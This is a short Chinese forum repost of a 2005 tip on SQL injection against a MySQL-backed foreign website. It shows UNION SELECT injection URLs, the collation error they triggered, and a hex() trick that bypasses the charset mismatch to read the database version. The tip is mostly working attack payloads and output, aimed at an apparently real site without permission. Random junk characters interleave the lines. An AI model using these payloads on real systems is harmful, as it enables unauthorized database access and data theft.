本文作者:SuperHei" _% S2 F( p7 T: F0 v7 c0 ~
文章性质:原创
7 p# _7 ^. k6 v' R8 U( O发布日期:2005-10-18" M* H" l7 A1 J/ u
测试个国外的站时:
/ G5 b" I/ [( ^5 Q/ [& Iurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*! Q9 `/ H# k; s' B8 ^( }
返回错误:
) L, Y/ Q( _, G* t" yIllegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
! s2 o+ \9 ?4 }* C8 V% zMySQL Error No. 126
$ D& U* ~$ M9 X% a6 i看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。 R; x* O7 @+ @) Q" B
解决办法:转为其他编码如hex。% p2 }, e5 X- r. A
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
* B9 W7 L! ~( |' _+ v成功得到hex(version())的值为:
+ Q4 T1 `7 Q$ O9 n( w342E312E332D62657461+ \" B) g7 l+ Q' ]
回Mysql查询下得到:" E$ @% ?2 |2 }. ?8 }2 f# |( C
mysql> select 0x342E312E332D62657461;4 U; E: i8 A6 t
+------------------------+. M4 F! T2 w6 q' S( e
| 0x342E312E332D62657461 |) G7 W! s0 r5 U4 p5 X
+------------------------+& q& I( [$ r% V4 u5 T
| 4.1.3-beta |
o4 j J1 n* K& \; d( H+------------------------+
# ^0 ^& D5 B/ t3 M4 }1 row in set (0.00 sec)! Z7 L d8 x: W6 r8 D
4 d" r% F' v- Q; v- e5 i1 w
|
发表于 2012-9-15 14:04:54
收藏
支持
反对